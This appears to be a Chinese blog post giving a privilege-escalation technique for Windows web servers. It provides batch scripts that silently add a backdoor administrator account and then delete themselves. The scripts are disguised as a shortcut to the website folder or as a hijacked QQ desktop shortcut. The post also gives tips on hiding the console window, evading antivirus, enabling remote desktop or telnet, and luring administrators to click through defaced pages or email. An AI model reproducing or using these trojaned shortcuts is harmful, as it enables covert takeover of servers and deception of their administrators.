因为最近在自己的博客里更新关于服务器提权的文章,所以在看了文章以后便有了个念头,何不用这种方式来实现服务器的提权。
新建一个temp.bat,内容
@echo off
net user enterer 123456 /add & net localgroup administrators enterer /add
start c:wwwroot
attrib "c:wwwroot" -h -s
del c:phptemp.bat
del c: wwwroot.lnk
exit
意思是在运行一个快捷方式的时候添加账号并且打开网站的文件夹,最后把文件夹的隐藏属性去掉并且删除自己。
这个是默认运行在C:php里的temp.bat 打开的网站文件夹是c:wwwroot可以根据现实进行修改。
点击temp.bat的右键选择建立快捷方式,把快捷方式放在网站一样的文件夹或者前一个文件夹。当你主动提权失败的时候就可以用这个方法了,可以挂黑页或者发email给管理员。管理员登陆服务器的时候,访问我们的快捷方式(他以为是网站的目录),此时就可以提权成功了。
这里给的是一种思路,不要问怎么把网站文件夹隐藏,怎么去掉快捷方式的箭头等等。因为用快捷方式会闪现一个CMD窗口,可以考虑把快捷方式改成exe文件(就不会有箭头,但是有后缀),把运行的bat改成exe或者vbs等,使CMD窗口不显现(具体可以用bat2exe等工具)。
或者你有权限修改桌面快捷方式,那就不担心箭头问题了。把管理员可能经常用的程序,如QQ等快捷方式修改成指向可以运行提权命令并可以运行QQ的bat文件。例如
@echo off
net user enterer 123456 /add & net localgroup administrators enterer /add
start c:qqqq.exe
exit
这个也算变相的捆绑了,不过绝对是免杀的。命令可以是加账号或者开3389,运行telnet服务等。怎么诱导管理员点击就是大家的问题了。
文章都是字可能大家不太习惯,希望大家有耐心看完,虽然这样提权的机会比较小,但是作为一种思路吧,呵呵。
登陆您的帐号 | 免费注册帐号